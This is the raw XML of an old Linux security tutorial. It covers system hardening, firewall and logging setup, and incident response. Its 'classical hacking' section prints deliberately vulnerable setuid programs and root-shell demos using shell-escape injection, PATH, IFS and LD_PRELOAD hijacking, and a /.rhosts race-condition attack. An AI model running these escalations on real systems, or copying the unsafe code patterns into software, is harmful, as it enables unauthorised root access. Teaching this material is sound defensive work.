        <w:t>How can protect the syste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Patch security hole often</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ncrypt important data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) pgp, ssh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Do not run unused daemon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Remove unused setuid/setgid program</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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etup loghost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Use switch hub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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etup firewall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) ipchains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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etup ID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) snort</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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heck unintentional change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) tripwire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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Backup the system oft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1-13. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>What should do after hacked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hutdown the system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Or turn off the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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eparate the system from network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Restore the system with the backup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Or reinstall all programs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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onnect the system to the networ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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>It can be good to call the pol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 xml:space="preserve">1-14. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How to translate the hackers’ langu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1 -&gt; i or l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3 -&gt; e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4 -&gt; a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7 -&gt; t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9 -&gt; g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0 -&gt; o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$ -&gt; s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| -&gt; i or l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|\| -&gt; n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|\/| -&gt; m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 -&gt; z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z -&gt; s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f -&gt; ph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ph -&gt; f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x -&gt; ck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k -&gt; x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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ampl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1 d1d n0t h4ck th1s p4g3, 1t w4s l1k3 th1s wh3n 1 h4ck3d 1n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----</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Wingdings" w:cs="Wingdings" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>I did not hack this page, it was like this when I hacked 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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Linux security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2-1. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Why do hackers use linux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imilar to unix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lmost all servers are unix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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asy to get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s don’t have much money</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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ource code is availabl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asy to modify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Easy to develop a progra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2-2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Why is linux hacked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4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Linux is widely used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asy to get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asy to us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igh performanc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igh reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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pplications source code is available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Easy to find a security vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47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oo many applications are default installed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All applications have many bu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2-3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Default installed daemon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re are too many default installed daemon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 admin must remove unused daemons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Change /etc/rc.d files and /etc/inetd.conf fi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[ ohhara@ohhara ~ ] {1} $ cd /etc/rc.d/init.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[ ohhara@ohhara /etc/rc.d/init.d ] {2} $ l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afs        gated    killall   network    rstatd   syslo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amd        gpm      kudzu     nfs        rusersd  xf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arpwatch   halt     ldap      nfslock    rwalld   xnt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atd        httpd    linuxconf nscd       rwhod    ypbi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autofs     inet     lpd       portmap    sendmail passwd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bootparamd innd     mars-new  postgresql single   ypserv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crond      irda     mcserv    pulse      sm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dhcpd      isdn     named     random     snm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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t>functions  keytable netfs     routed     squi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[ ohhara@ohhara /etc/rc.d/init.d ] {3} $ cd /etc/rc.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[ ohhara@ohhara /etc/rc.d ] {4} $ find . -name "*httpd*" -pri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./init.d/htt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./rc0.d/K15htt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./rc1.d/K15htt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./rc2.d/K15htt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./rc3.d/S85htt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./rc4.d/S85htt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./rc5.d/S85htt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./rc6.d/K15htt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[ ohhara@ohhara /etc/rc.d ] {5} $ rm –f rc3.d/S85httpd rc4.d/S85httpd rc5.d/S85http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[ ohhara@ohhara /etc/rc.d ] {6} $ /etc/rc.d/init.d/httpd sto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Shutting down http: [  OK  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[ ohhara@ohhara /etc/rc.d ] {7} $ vi /etc/inetd.con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( comment out unused daemons with ‘#’ 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[ ohhara@ohhara /etc/rc.d ] {8} $ killall –HUP inet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  <w:t>[ ohhara@ohhara /etc/rc.d ] {9} $</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/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2-4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Default installed setuid program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re are too many default installed setuid program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 admin must remove unused setuid program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1} $ find / -perm -4000 -exec ls -l {} \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rws--x--x   1 root     root         6340 Nov 16 10:19 /usr/X11R6/bin/Xwrapp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rwsr-xr-x   1 games    games       34488 May 19  1999 /usr/X11R6/bin/xhextr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( . . . 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rwsr-sr-x   1 root     tty         72668 Sep 26 01:07 /sbin/resto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r-sr-xr-x   1 root     root        29022 Jan  4 09:40 /sbin/pwdb_chkpw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2} $ chmod a-s /sbin/resto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3} $ ls –l /sbin/resto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rwxr-xr-x   1 root     tty         72668 Sep 26 01:07 /sbin/resto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  <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[ ohhara@ohhara ~ ] {4} $</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="굴림" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New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2-5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Setup tcpwrapper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llow or disallow the connection from specific IP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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ontrol the connection to the daemons in the /etc/inetd.conf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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Setup files are /etc/hosts.allow and /etc/hosts.deny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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/etc/hosts.deny</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="200" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:rPr>
        <w:t>ALL:ALL: spawn ((/usr/sbin/safe_finger -l @%h | /bin/mail root)&amp;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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/etc/hosts.allo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n.telnetd: 141.223., 127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n.ftpd: 141.223., 127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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>portmap: 141.223., 127.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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For more information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ftp://ftp.porcupine.org/pub/security/index.html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man 5 hosts_acc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2-6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Setup ipchain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Filter IP packet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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t’s a good solution to setup firewall</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Be careful before setup ipchains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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t’s very powerful but very complicated</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false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pchains -A input -p TCP -s '!' 141.223.0.0/255.255.0.0 -j DENY -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pchains -A input -p TCP -s 141.223.1.2/255.255.255.255 domain -j ACCEP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pchains -A input -p TCP -d 0.0.0.0/0 :1024 -y -j DENY -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pchains -A input -p UDP -s '!' 141.223.0.0/255.255.0.0 -j DENY -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pchains -A input -p UDP -s 141.223.1.2/255.255.255.255 domain -j ACCEP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pchains -A input -p UDP -d 0.0.0.0/0 '!' syslog -j DENY -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pchains -A input -p ICMP -s 0.0.0.0/0 0 -j DENY -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pchains -A input -p ICMP -s 0.0.0.0/0 8 -j DENY –l</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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For more information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ttp://www.rustcorp.com/linux/ipchains/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ttp://kldp.org/Translations/IPCHAINS-HOWTO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man ipchai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2-7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Setup loghost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yslogd can send the log to the loghost</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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o send log to the loghost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hange /etc/syslog.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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o receive log from the host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Run syslogd with ‘-r’ option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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/etc/syslog.conf ( client setup )</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false"/>
        <w:ind w:left="200" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:bdr w:val="single" w:sz="4" w:space="0" w:color="000000"/>
        </w:rPr>
        <w:t>*.debug                     @141.223.xxx.xxx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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>loghost setup ( server setup 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1} $ vi /etc/rc.d/init.d/syslo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( change ‘daemon syslogd -m 0’ to ‘daemon syslogd -m 0 –r’ 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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>[ ohhara@ohhara ~ ] {2} $ /etc/rc.d/init.d/syslog resta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2-8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>How to patch vulnerable program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51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heck the linux distribution homepage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Ex) Redhat, Debian, Alzza, and so on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Patch vulnerable programs in the redhat linux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Download package from http://www.redhat.com/support/errata/rh-errata.html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rpm –U packagename.rp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</w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Classical Hacking technique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3-1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Physical attack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4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earch password in admin’s desk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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teal a hard disk or a computer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rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Break door with a hamm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3-2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Social engineering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sk admin admin’s passwor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굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Send email, which tells to change the password, to all us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/>
        <w:t xml:space="preserve">3.3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Shell escap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ry to get the shell from program by using shell escape character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) ; | , ‘ “ ! % &amp; ( ) . . .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1} $ cat ex_finger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io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lib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unistd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ain(int argc,char **argv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char cmd[100]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etuid(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etgid(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if(argc&gt;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sprintf(cmd,"/usr/bin/finger %s",argv[1]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system(cmd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2} $ ls -l ex_fing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--s--x--x   1 root     root        22961 Jan  3 19:33 ex_finger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3} $ ./ex_finger 'bin;/bin/sh'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Login name: b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Directory: /usr/b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Never logged i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ail last read Fri Dec 31 17:50:28 199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No Pla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 whoam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roo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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#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3-4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>PATH attack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PATH is executable program search path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PATH can be changed by the hacker</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:autoSpaceDE w:val="false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1} $ cat ex_who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lib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unistd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ain(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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>setuid(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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>setgid(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굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>system("who"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2} $ ls -l ex_wh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--s--s--x   1 root     root         3136 Mar  6 17:29 ex_who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3} $ cat wh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!/bin/s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/bin/s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4} $ PATH=.:${PATH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5} $ export PAT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6} $ ./ex_wh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 whoam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roo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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#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3-5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>IFS attack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FS is Internal Field Separator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ommand argument is separated by IFS valu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Default IFS value is ‘ ‘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)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ls –al</w:t>
        <w:tab/>
        <w:t>-&gt;</w:t>
        <w:tab/>
        <w:t>ls</w:t>
        <w:tab/>
        <w:t>-al</w:t>
        <w:tab/>
        <w:t>( IFS = ‘ ‘ )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ls/-al</w:t>
        <w:tab/>
        <w:t>-&gt;</w:t>
        <w:tab/>
        <w:t>ls</w:t>
        <w:tab/>
        <w:t>-al</w:t>
        <w:tab/>
        <w:t>( IFS = ‘/’ )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1} $ cat ex_date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lib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unistd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ain(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etuid(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etgid(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ystem("/bin/date"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2} $ ls -l ex_da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--s--x--x   1 root     root        22811 Jan  3 21:19 ex_date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3} $ cat b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!/bin/s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FS=' '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export IF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/bin/s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4} $ IFS=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5} $ export IF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6} $ PATH=.:${PATH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7} $ export PAT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8} $ ./ex_da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 whoam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roo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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#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/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">3-6. </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>LD_PRELOAD attack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LD_LIBRARY_PATH is dynamic link library path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LD_PRELOAD is dynamic link library path which is loaded before LD_LIBRARY_PATH is loaded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1} $ cat ex_print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io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unistd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ain(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etuid(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etgid(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printf("hello!\n"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2} $ ls -l ex_pri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--s--x--x   1 root     root         4290 Jan  3 21:48 ex_print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3} $ cat ex_print_so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void printf(char *st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execl("/bin/sh","sh",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4} $ gcc –shared –o ex_print_so.so ex_print_so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5} $ LD_PRELOAD=./ex_print_so.s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6} $ export LD_PRELOA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7} $ ./ex_pri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 whoam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roo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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#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3-7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Race condition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Race condition is occurred when two or more processes try to use one resource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64"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Race condition of UNIX security is occurred in the file system.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64"/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
          <w:sz w:val="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8565" cy="2452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452320"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5028480" cy="2452320"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="720" y="377280"/>
                            <a:ext cx="50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7756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7756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7756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112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ormal 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84600"/>
                            <a:ext cx="50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4280"/>
                            <a:ext cx="112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ttack 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1650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ccess(“good”,W_O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980000"/>
                            <a:ext cx="16866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Remove “good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ink “good” to “/.rhost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1953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Open(“good”,O_WR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6560" y="226080"/>
                            <a:ext cx="58356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0480" y="929160"/>
                            <a:ext cx="23090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Write to not “good” but “/.rhost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5.9pt;height:193.15pt" coordorigin="180,180" coordsize="7918,3863">
                <v:line id="shape_0" from="181,774" to="8098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9,617" to="1949,40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25,617" to="4025,40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80,617" to="6180,40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80;top:854;width:176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ormal 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3148" to="8098,3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226;width:176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ttack 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80;width:25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ccess(“good”,W_O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3298;width:265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Remove “good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ink “good” to “/.rhost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80;width:307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Open(“good”,O_WRON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5,536" to="5943,164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02;top:1644;width:363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Write to not “good” but “/.rhosts”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1} $ cat ex_race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io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unistd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fcntl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ain(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int fd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char *data="+ +\n"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etuid(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etgid(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if(access("good",W_OK)==0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sleep(3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fd=open("good",O_WRONLY|O_TRUNC|O_CREAT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write(fd,data,4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close(fd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2} $ ls -l ex_ra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--s--x--x   1 root     root         4728 Jan  4 13:23 ex_race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3} $ ls –l /.rhos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ls: /.rhosts: No such file or directo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4} $ touch goo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5} $ ./ex_race &amp; ; ln -sf /.rhosts goo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6} $ cat /.rhos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+ +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7} $ rlogin –l root localho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 whoam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roo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/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>#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3-7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Buffer overflow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Write unexpected memory area by overflowing buffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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 most famous hacking technique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26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lmost all cases, buffer overflow means stack buffer overflow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Recently, heap buffer overflow attack is introduced</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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s can execute arbitrary command by overflowing buffer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44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Machine and OS dependent hacking technique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eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>This topic will be discussed la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3-8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="굴림" w:ascii="굴림" w:hAnsi="굴림"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Sniff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3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thernet broadcasts to transmit data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s can see all network packets in the ethernet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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Network packets contains user id, password, and other useful information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 Easiest and the most powerful hacking techniqu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2995" cy="3199130"/>
                <wp:effectExtent l="0" t="285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3198960"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4912920" cy="3198960"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wpg:grpSp>
                        <wpg:cNvGrpSpPr/>
                        <wpg:grpSpPr>
                          <a:xfrm>
                            <a:off x="397440" y="2018160"/>
                            <a:ext cx="203472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BS00580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280" y="2410920"/>
                            <a:ext cx="6649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83400" y="0"/>
                            <a:ext cx="0" cy="20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216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7160" y="392400"/>
                            <a:ext cx="203472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BS00580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6280" y="2410920"/>
                            <a:ext cx="6649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S00580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2920" y="784800"/>
                            <a:ext cx="6649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S00580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74560" y="784800"/>
                            <a:ext cx="6649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S00580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48000" y="784800"/>
                            <a:ext cx="6649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7440" y="2018160"/>
                            <a:ext cx="0" cy="337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18160"/>
                            <a:ext cx="885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0" cy="201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2167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0"/>
                            <a:ext cx="0" cy="39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92400"/>
                            <a:ext cx="177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92400"/>
                            <a:ext cx="0" cy="335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D06790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80440" y="2410920"/>
                            <a:ext cx="75168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3400" y="2018160"/>
                            <a:ext cx="114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18160"/>
                            <a:ext cx="0" cy="337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018160"/>
                            <a:ext cx="0" cy="337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92400"/>
                            <a:ext cx="884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92400"/>
                            <a:ext cx="973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92400"/>
                            <a:ext cx="0" cy="335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92400"/>
                            <a:ext cx="0" cy="335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7792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5000"/>
                            <a:ext cx="1152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etwork pa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1758240"/>
                            <a:ext cx="11494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Broadcas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etwork pa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2520" y="1963440"/>
                            <a:ext cx="9291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9280" y="391680"/>
                            <a:ext cx="79632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240" y="391680"/>
                            <a:ext cx="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1400" y="274752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2566800"/>
                            <a:ext cx="115056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Hacker can s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etwork pa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6.85pt;height:251.9pt" coordorigin="360,0" coordsize="7737,5038">
                <v:group id="shape_0" style="position:absolute;left:986;top:3178;width:3203;height:616">
                  <v:line id="shape_0" from="986,3178" to="4189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3178" to="986,3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3178" to="4190,3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3178" to="2657,3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S00580_" stroked="f" o:allowincell="f" style="position:absolute;left:430;top:3797;width:1046;height:11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381,0" to="2381,3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1,0" to="579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0" to="5796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03;top:618;width:3203;height:616">
